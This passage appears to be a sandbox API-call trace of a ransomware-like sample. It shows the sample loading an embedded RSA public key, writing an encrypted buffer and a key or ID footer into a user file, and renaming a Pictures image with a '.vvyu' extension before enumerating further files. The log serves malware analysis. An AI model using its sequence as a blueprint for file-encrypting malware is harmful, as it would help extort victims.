KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0191.404] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.404] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.404] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0191.405] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0191.405] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0191.405] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0191.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0191.405] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0191.405] GetLastError () returned 0x0 [0191.405] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0191.405] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0191.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0191.406] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0191.406] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0191.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0191.406] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0191.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0191.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c10) returned 0x2ae6ea0 [0191.406] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0191.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0191.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0191.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0191.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0191.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0191.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3858 [0191.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6020 [0191.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38a0 [0191.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6038 [0191.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6068 [0191.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60c8 [0191.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6080 [0191.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0191.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0191.407] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0191.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0191.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6068 | out: hHeap=0x2c0000) returned 1 [0191.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6080 | out: hHeap=0x2c0000) returned 1 [0191.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60c8 | out: hHeap=0x2c0000) returned 1 [0191.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0191.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60c8 [0191.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0191.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6080 [0191.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0191.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6068 [0191.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0191.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0191.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0191.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0191.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0191.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0191.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0191.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0191.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6080 | out: hHeap=0x2c0000) returned 1 [0191.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0191.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6068 | out: hHeap=0x2c0000) returned 1 [0191.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0191.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0191.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60c8 | out: hHeap=0x2c0000) returned 1 [0191.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0191.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0191.411] GetCurrentThreadId () returned 0x5d8 [0191.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0191.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae5b68 [0191.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0191.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0191.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0191.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0191.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0191.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0191.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.411] GetCurrentThreadId () returned 0x5d8 [0191.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0191.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0191.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0191.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0191.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0191.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0191.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0191.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60c8 [0191.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0191.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0191.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0191.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0191.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0191.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0191.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0191.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0191.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6068 [0191.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0191.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0191.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0191.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0191.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0191.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0191.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0191.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6080 [0191.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0191.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0191.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0191.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6050 [0191.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0191.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae60e0 [0191.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0191.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0191.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0191.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60b0 [0191.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0191.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6098 [0191.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0191.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae60f8 [0191.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6098 | out: hHeap=0x2c0000) returned 1 [0191.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6098 [0191.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60b0 | out: hHeap=0x2c0000) returned 1 [0191.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0191.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0191.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0191.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0191.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0191.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6068 | out: hHeap=0x2c0000) returned 1 [0191.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6068 [0191.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0191.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2aebab8 [0191.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60c8 | out: hHeap=0x2c0000) returned 1 [0191.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0191.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60f8 | out: hHeap=0x2c0000) returned 1 [0191.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2aebcc8 [0191.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0191.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0191.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0191.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6068 | out: hHeap=0x2c0000) returned 1 [0191.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af3f88 [0191.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0191.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0191.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0191.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0191.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0191.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0191.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0191.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0191.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aebcc8 | out: hHeap=0x2c0000) returned 1 [0191.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0191.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6098 | out: hHeap=0x2c0000) returned 1 [0191.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0191.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60e0 | out: hHeap=0x2c0000) returned 1 [0191.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0191.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6080 | out: hHeap=0x2c0000) returned 1 [0191.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6050 | out: hHeap=0x2c0000) returned 1 [0191.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0191.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0191.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0191.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6038 | out: hHeap=0x2c0000) returned 1 [0191.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38a0 | out: hHeap=0x2c0000) returned 1 [0191.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aebab8 | out: hHeap=0x2c0000) returned 1 [0191.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0191.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0191.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0191.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0191.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0191.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0191.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0191.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0191.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0191.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0191.422] WriteFile (in: hFile=0x584, lpBuffer=0x2ae6ea0*, nNumberOfBytesToWrite=0x4c08, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ae6ea0*, lpNumberOfBytesWritten=0x2f9fb14*=0x4c08, lpOverlapped=0x0) returned 1 [0191.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ea0 | out: hHeap=0x2c0000) returned 1 [0191.423] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x4c0d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.423] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0191.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0191.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0191.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0191.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0191.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0191.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0191.424] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0191.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0191.424] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0191.424] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0191.424] CloseHandle (hObject=0x584) returned 1 [0191.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0191.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0191.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0191.426] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\vaUZY4mlwUOC1Eph.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\vauzy4mlwuoc1eph.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\vaUZY4mlwUOC1Eph.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\vauzy4mlwuoc1eph.bmp.vvyu")) returned 1 [0191.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.428] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0191.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0191.431] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5abc640, ftCreationTime.dwHighDateTime=0x1d8a334, ftLastAccessTime.dwLowDateTime=0x660dad30, 